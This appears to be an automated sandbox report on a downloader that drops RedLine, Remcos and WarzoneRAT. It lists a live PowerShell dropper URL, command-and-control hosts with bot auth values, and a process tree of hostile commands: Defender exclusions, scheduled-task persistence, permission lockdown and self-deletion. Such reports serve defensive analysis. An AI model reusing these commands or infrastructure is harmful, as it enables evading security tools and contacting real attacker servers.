redline | 188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae

max time kernel
11s
max time network
541s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
08-06-2023 16:59

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

a.exe
Size

5KB
MD5

8ce1f6882edc51f701bbe648e40dd133
SHA1

496b3df4657e9d11df14a8ad267061d97249b511
SHA256

188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae
SHA512

5826ea307fa12db5a8005fae8758314c0810e956ead3504fda7cadaccdbe737d609dfdfdc51996ab2eb350eae20398f8fbb97b16aa01f2af373c1ba20767d7d6
SSDEEP

48:6jtGAK8lb9ivcfaFSfkQLJhyPFlL8thCb/IExQpwOulavTqXSfbNtm:OI0iUaakQqDgtmQpmsvNzNt

Score

10^/10

redline remcos warzonerat crazy duha muha remotefhostf remotehost evasion infostealer persistence rat upx vmprotect

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1

Extracted

Family

remcos

Botnet

RemoteHost

pekonomiana.duckdns.org:30491

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
install_path
%Temp%
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-EORWFM
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

remcos

Botnet

RemotefHostf

94.142.138.111:5701

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
rfmcos.exe
copy_folder
Rfmcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
true
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmcf-6KJV62
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

redline

Botnet

muha

83.97.73.129:19068

Attributes

auth_value
3c237e5fecb41481b7af249e79828a46

Extracted

Family

redline

Botnet

crazy

83.97.73.129:19068

Attributes

auth_value
66bc4d9682ea090eef64a299ece12fdd

Extracted

Family

redline

Botnet

duha

83.97.73.129:19068

Attributes

auth_value
aafe99874c3b8854069470882e00246c

Extracted

Family

warzonerat

193.42.32.191:8282

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

Warzone RAT payload 2 IoCs

rat

resource	yara_rule
behavioral1/memory/4824-979-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral1/memory/4824-970-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat

Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 10 IoCs

pid	Process
3200	hkcmd.exe
2188	netTime.exe
3732	cleanmgr.exe
3968	YY.exe
1748	photo250.exe
2052	v3495361.exe
2596	v7408000.exe
3208	a5675133.exe
3404	wininit.exe
3720	remcos_a2.exe

Loads dropped DLL 2 IoCs

pid	Process
3200	hkcmd.exe
3404	Process not Found

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4820-968-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/4820-976-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/4820-972-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/4820-989-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/4820-994-0x0000000010000000-0x000000001003E000-memory.dmp	upx

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x000600000001af67-817.dat	vmprotect
behavioral1/files/0x000600000001af67-819.dat	vmprotect
behavioral1/memory/4820-939-0x0000000000400000-0x000000000189D000-memory.dmp	vmprotect

Adds Run key to start application 2 TTPs 10 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	v7408000.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows\CurrentVersion\Run\	remcos_a2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows\CurrentVersion\Run\Rmcf-6KJV62 = "\"C:\\ProgramData\\Rfmcos\\rfmcos.exe\""	remcos_a2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	v3495361.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	photo250.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	v3495361.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	v7408000.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\	remcos_a2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmcf-6KJV62 = "\"C:\\ProgramData\\Rfmcos\\rfmcos.exe\""	remcos_a2.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	photo250.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
174	checkip.dyndns.org
207	api.ipify.org
304	ip-api.com
417	ipinfo.io
418	ipinfo.io

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3968 set thread context of 348	3968	YY.exe	78
PID 3208 set thread context of 228	3208	a5675133.exe	79

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5204	sc.exe
6320	sc.exe
7748	sc.exe
7456	sc.exe
8048	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 13 IoCs

pid	pid_target	Process	procid_target
1988	3208	WerFault.exe	73
3972	3376	WerFault.exe	88
3296	2760	WerFault.exe	103
3916	2908	WerFault.exe	138
3840	4276	WerFault.exe	141
5732	6124	WerFault.exe	211
5396	5988	WerFault.exe	208
5880	5336	WerFault.exe	213
5968	4304	WerFault.exe	120
3808	3264	WerFault.exe	256
6816	4984	WerFault.exe	282
3108	6944	WerFault.exe	305
4844	7132	WerFault.exe	301

NSIS installer 8 IoCs

installer

resource	yara_rule
behavioral1/files/0x000800000001af21-126.dat	nsis_installer_1
behavioral1/files/0x000800000001af21-126.dat	nsis_installer_2
behavioral1/files/0x000800000001af21-127.dat	nsis_installer_1
behavioral1/files/0x000800000001af21-127.dat	nsis_installer_2
behavioral1/files/0x000600000001af47-196.dat	nsis_installer_1
behavioral1/files/0x000600000001af47-196.dat	nsis_installer_2
behavioral1/files/0x000600000001af47-206.dat	nsis_installer_1
behavioral1/files/0x000600000001af47-206.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3248	schtasks.exe
5148	schtasks.exe
7072	schtasks.exe
3264	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5004	timeout.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
7600	tasklist.exe

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
1868	NETSTAT.EXE
5156	ipconfig.exe
4688	ipconfig.exe

GoLang User-Agent 9 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	328	Go-http-client/1.1
HTTP User-Agent header	516	Go-http-client/1.1
HTTP User-Agent header	525	Go-http-client/1.1
HTTP User-Agent header	315	Go-http-client/1.1
HTTP User-Agent header	320	Go-http-client/1.1
HTTP User-Agent header	345	Go-http-client/1.1
HTTP User-Agent header	353	Go-http-client/1.1
HTTP User-Agent header	358	Go-http-client/1.1
HTTP User-Agent header	508	Go-http-client/1.1

Kills process with taskkill 1 IoCs

evasion

pid	Process
7004	taskkill.exe

Runs net.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
7752	PING.EXE
5028	PING.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3968	YY.exe
3968	YY.exe
3968	YY.exe
3968	YY.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2652	a.exe
Token: SeDebugPrivilege	3968	YY.exe
Token: SeDebugPrivilege	3732	cleanmgr.exe
Token: SeDebugPrivilege	2188	netTime.exe

Suspicious use of WriteProcessMemory 55 IoCs

description	pid	Process	procid_target
PID 2652 wrote to memory of 3200	2652	a.exe	67
PID 2652 wrote to memory of 3200	2652	a.exe	67
PID 2652 wrote to memory of 3200	2652	a.exe	67
PID 2652 wrote to memory of 2188	2652	a.exe	68
PID 2652 wrote to memory of 2188	2652	a.exe	68
PID 2652 wrote to memory of 3732	2652	a.exe	69
PID 2652 wrote to memory of 3732	2652	a.exe	69
PID 2652 wrote to memory of 3732	2652	a.exe	69
PID 2652 wrote to memory of 3968	2652	a.exe	70
PID 2652 wrote to memory of 3968	2652	a.exe	70
PID 2652 wrote to memory of 1748	2652	a.exe	71
PID 2652 wrote to memory of 1748	2652	a.exe	71
PID 2652 wrote to memory of 1748	2652	a.exe	71
PID 1748 wrote to memory of 2052	1748	photo250.exe	75
PID 1748 wrote to memory of 2052	1748	photo250.exe	75
PID 1748 wrote to memory of 2052	1748	photo250.exe	75
PID 2052 wrote to memory of 2596	2052	v3495361.exe	72
PID 2052 wrote to memory of 2596	2052	v3495361.exe	72
PID 2052 wrote to memory of 2596	2052	v3495361.exe	72
PID 2596 wrote to memory of 3208	2596	v7408000.exe	73
PID 2596 wrote to memory of 3208	2596	v7408000.exe	73
PID 2596 wrote to memory of 3208	2596	v7408000.exe	73
PID 3968 wrote to memory of 2084	3968	YY.exe	76
PID 3968 wrote to memory of 2084	3968	YY.exe	76
PID 3968 wrote to memory of 2084	3968	YY.exe	76
PID 3968 wrote to memory of 3696	3968	YY.exe	90
PID 3968 wrote to memory of 3696	3968	YY.exe	90
PID 3968 wrote to memory of 3696	3968	YY.exe	90
PID 3968 wrote to memory of 348	3968	YY.exe	78
PID 3968 wrote to memory of 348	3968	YY.exe	78
PID 3968 wrote to memory of 348	3968	YY.exe	78
PID 3968 wrote to memory of 348	3968	YY.exe	78
PID 3968 wrote to memory of 348	3968	YY.exe	78
PID 3968 wrote to memory of 348	3968	YY.exe	78
PID 3968 wrote to memory of 348	3968	YY.exe	78
PID 3968 wrote to memory of 348	3968	YY.exe	78
PID 3968 wrote to memory of 348	3968	YY.exe	78
PID 3968 wrote to memory of 348	3968	YY.exe	78
PID 3968 wrote to memory of 348	3968	YY.exe	78
PID 3968 wrote to memory of 348	3968	YY.exe	78
PID 3208 wrote to memory of 228	3208	a5675133.exe	79
PID 3208 wrote to memory of 228	3208	a5675133.exe	79
PID 3208 wrote to memory of 228	3208	a5675133.exe	79
PID 3208 wrote to memory of 228	3208	a5675133.exe	79
PID 3208 wrote to memory of 228	3208	a5675133.exe	79
PID 2652 wrote to memory of 3404	2652	a.exe	80
PID 2652 wrote to memory of 3404	2652	a.exe	80
PID 2652 wrote to memory of 3404	2652	a.exe	80
PID 2188 wrote to memory of 3316	2188	netTime.exe	86
PID 2188 wrote to memory of 3316	2188	netTime.exe	86
PID 2188 wrote to memory of 3368	2188	netTime.exe	81
PID 2188 wrote to memory of 3368	2188	netTime.exe	81
PID 2652 wrote to memory of 3720	2652	a.exe	84
PID 2652 wrote to memory of 3720	2652	a.exe	84
PID 2652 wrote to memory of 3720	2652	a.exe	84

C:\Users\Admin\AppData\Local\Temp\a.exe
"C:\Users\Admin\AppData\Local\Temp\a.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2652
- C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe
  "C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3200
- - C:\Program Files (x86)\internet explorer\ieinstal.exe
    "C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe"
    3⤵
    PID:4556
- - C:\Program Files (x86)\internet explorer\ieinstal.exe
    "C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe"
    3⤵
    PID:5412
- C:\Users\Admin\AppData\Local\Temp\a\netTime.exe
  "C:\Users\Admin\AppData\Local\Temp\a\netTime.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2188
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
    3⤵
    PID:3368
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
    3⤵
    PID:3316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7FF4.tmp.bat""
    3⤵
    PID:4928
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:5004
  - - C:\ProgramData\Timeupper\HVPIO.exe
      "C:\ProgramData\Timeupper\HVPIO.exe"
      4⤵
      PID:4304
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        5⤵
        
        PID:996
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HVPIO" /tr "C:\ProgramData\Timeupper\HVPIO.exe"
        5⤵
        
        PID:3116
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HVPIO" /tr "C:\ProgramData\Timeupper\HVPIO.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:3248
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
        5⤵
        
        PID:980
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4304 -s 2012
        5⤵
        Program crash
        
        PID:5968
- C:\Users\Admin\AppData\Local\Temp\a\cleanmgr.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cleanmgr.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3732
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YY.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YY.exe"
    3⤵
    PID:3696
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:3312
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 1 & Del "C:\Users\Admin\AppData\Local\Temp\a\cleanmgr.exe"
    3⤵
    PID:3164
  - - C:\Windows\SysWOW64\choice.exe
      choice /C Y /N /D Y /T 1
      4⤵
      PID:2572
- C:\Users\Admin\AppData\Local\Temp\a\YY.exe
  "C:\Users\Admin\AppData\Local\Temp\a\YY.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3968
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:2084
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:3696
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:348
- C:\Users\Admin\AppData\Local\Temp\a\photo250.exe
  "C:\Users\Admin\AppData\Local\Temp\a\photo250.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:1748
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3495361.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3495361.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:2052
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c1004524.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c1004524.exe
      4⤵
      PID:3684
    - - C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe"
        5⤵
        
        PID:3556
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN lamod.exe /TR "C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:3264
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "lamod.exe" /P "Admin:N"&&CACLS "lamod.exe" /P "Admin:R" /E&&echo Y|CACLS "..\a9e2a16078" /P "Admin:N"&&CACLS "..\a9e2a16078" /P "Admin:R" /E&&Exit
        6⤵
        
        PID:3688
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        7⤵
        
        PID:4204
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "lamod.exe" /P "Admin:N"
        7⤵
        
        PID:4220
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "lamod.exe" /P "Admin:R" /E
        7⤵
        
        PID:4276
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        7⤵
        
        PID:4464
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\a9e2a16078" /P "Admin:N"
        7⤵
        
        PID:4504
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\a9e2a16078" /P "Admin:R" /E
        7⤵
        
        PID:4900
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
        6⤵
        
        PID:4344
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d8408767.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d8408767.exe
    3⤵
    PID:2760
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
      4⤵
      PID:3204
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 592
      4⤵
      Program crash
      PID:3296
- C:\Users\Admin\AppData\Local\Temp\a\wininit.exe
  "C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"
  2⤵
  - Executes dropped EXE
  PID:3404
- - C:\Users\Admin\AppData\Local\Temp\a\wininit.exe
    "C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"
    3⤵
    PID:1084
- C:\Users\Admin\AppData\Local\Temp\a\remcos_a2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\remcos_a2.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:3720
- - C:\ProgramData\Rfmcos\rfmcos.exe
    "C:\ProgramData\Rfmcos\rfmcos.exe"
    3⤵
    PID:3724
- C:\Users\Admin\AppData\Local\Temp\a\bld_4.exe
  "C:\Users\Admin\AppData\Local\Temp\a\bld_4.exe"
  2⤵
  PID:3376
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 3376 -s 944
    3⤵
    - Program crash
    PID:3972
- C:\Users\Admin\AppData\Local\Temp\a\%E4%BF%A1%E5%A4%A9%E6%B8%B8.exe
  "C:\Users\Admin\AppData\Local\Temp\a\%E4%BF%A1%E5%A4%A9%E6%B8%B8.exe"
  2⤵
  PID:4820
- C:\Users\Admin\AppData\Local\Temp\a\foto124.exe
  "C:\Users\Admin\AppData\Local\Temp\a\foto124.exe"
  2⤵
  PID:4856
- - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\x1656800.exe
    C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\x1656800.exe
    3⤵
    PID:1020
  - - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\x0221599.exe
      C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\x0221599.exe
      4⤵
      PID:4920
    - - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\f1902271.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\f1902271.exe
        5⤵
        
        PID:4952
    - - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\g3882055.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\g3882055.exe
        5⤵
        
        PID:5392
  - - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\h4870874.exe
      C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\h4870874.exe
      4⤵
      PID:5736
- - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\i3958399.exe
    C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\i3958399.exe
    3⤵
    PID:5988
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
      4⤵
      PID:3548
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5988 -s 132
      4⤵
      Program crash
      PID:5396
- C:\Users\Admin\AppData\Local\Temp\a\fotod25.exe
  "C:\Users\Admin\AppData\Local\Temp\a\fotod25.exe"
  2⤵
  PID:928
- - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\y6893511.exe
    C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\y6893511.exe
    3⤵
    PID:1076
  - - C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\m1541384.exe
      C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\m1541384.exe
      4⤵
      PID:5388
- - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\n1470441.exe
    C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\n1470441.exe
    3⤵
    PID:3264
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
      4⤵
      PID:4336
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3264 -s 592
      4⤵
      Program crash
      PID:3808
- C:\Users\Admin\AppData\Local\Temp\a\dot.exe
  "C:\Users\Admin\AppData\Local\Temp\a\dot.exe"
  2⤵
  PID:4248
- C:\Users\Admin\AppData\Local\Temp\a\metro.exe
  "C:\Users\Admin\AppData\Local\Temp\a\metro.exe"
  2⤵
  PID:4276
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
    3⤵
    PID:232
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 144
    3⤵
    - Program crash
    PID:3840
- C:\Users\Admin\AppData\Local\Temp\a\sonne.exe
  "C:\Users\Admin\AppData\Local\Temp\a\sonne.exe"
  2⤵
  PID:4516
- C:\Users\Admin\AppData\Local\Temp\a\SS.exe
  "C:\Users\Admin\AppData\Local\Temp\a\SS.exe"
  2⤵
  PID:4612
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:4824
- C:\Users\Admin\AppData\Local\Temp\a\nevv.exe
  "C:\Users\Admin\AppData\Local\Temp\a\nevv.exe"
  2⤵
  PID:2836
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:3356
- C:\Users\Admin\AppData\Local\Temp\a\pmCxohhd.exe
  "C:\Users\Admin\AppData\Local\Temp\a\pmCxohhd.exe"
  2⤵
  PID:3400
- - C:\Users\Admin\AppData\Local\Temp\a\pmCxohhd.exe
    C:\Users\Admin\AppData\Local\Temp\a\pmCxohhd.exe
    3⤵
    PID:3672
- C:\Users\Admin\AppData\Local\Temp\a\ghjkl.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ghjkl.exe"
  2⤵
  PID:728
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
    3⤵
    PID:4540
- - C:\Users\Admin\AppData\Local\Temp\Ixgzydftvdfqbldoxvzktk.exe
    "C:\Users\Admin\AppData\Local\Temp\Ixgzydftvdfqbldoxvzktk.exe"
    3⤵
    PID:3636
  - - C:\Users\Admin\AppData\Local\Temp\Ixgzydftvdfqbldoxvzktk.exe
      C:\Users\Admin\AppData\Local\Temp\Ixgzydftvdfqbldoxvzktk.exe
      4⤵
      PID:6236
- - C:\Users\Admin\AppData\Local\Temp\a\ghjkl.exe
    C:\Users\Admin\AppData\Local\Temp\a\ghjkl.exe
    3⤵
    PID:396
- C:\Users\Admin\AppData\Local\Temp\a\NA.exe
  "C:\Users\Admin\AppData\Local\Temp\a\NA.exe"
  2⤵
  PID:3956
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:4936
- C:\Users\Admin\AppData\Local\Temp\a\BHHh.exe
  "C:\Users\Admin\AppData\Local\Temp\a\BHHh.exe"
  2⤵
  PID:4688
- C:\Users\Admin\AppData\Local\Temp\a\BBHhHhB.exe
  "C:\Users\Admin\AppData\Local\Temp\a\BBHhHhB.exe"
  2⤵
  PID:4756
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YYY.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YYY.exe"
    3⤵
    PID:3748
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
      4⤵
      PID:4520
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 1 & Del "C:\Users\Admin\AppData\Local\Temp\a\BBHhHhB.exe"
    3⤵
    PID:3436
  - - C:\Windows\SysWOW64\choice.exe
      choice /C Y /N /D Y /T 1
      4⤵
      PID:6004
- C:\Users\Admin\AppData\Local\Temp\a\HHGgG.exe
  "C:\Users\Admin\AppData\Local\Temp\a\HHGgG.exe"
  2⤵
  PID:3620
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:4232
- C:\Users\Admin\AppData\Local\Temp\a\H.exe
  "C:\Users\Admin\AppData\Local\Temp\a\H.exe"
  2⤵
  PID:3396
